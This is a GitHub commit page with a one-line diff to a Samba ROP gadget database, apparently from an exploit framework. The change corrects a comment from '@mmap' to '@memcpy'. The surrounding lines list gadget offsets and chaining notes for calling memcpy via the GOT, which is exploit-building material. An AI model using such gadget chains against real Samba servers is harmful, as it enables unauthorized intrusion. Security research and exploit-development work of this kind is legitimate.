We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 3e3c518 commit f819ec8Copy full SHA for f819ec8
data/ropdb/samba.xml
@@ -116,7 +116,7 @@
116
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
117
<gadget offset="0x0006933f">pop eax; ret</gadget>
118
<gadget offset="0x00083024">memcpy@got - 4</gadget>
119
- <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
+ <gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
120
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
121
<gadget offset="0x00004803">pop esi ; ret</gadget>
122
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
0 commit comments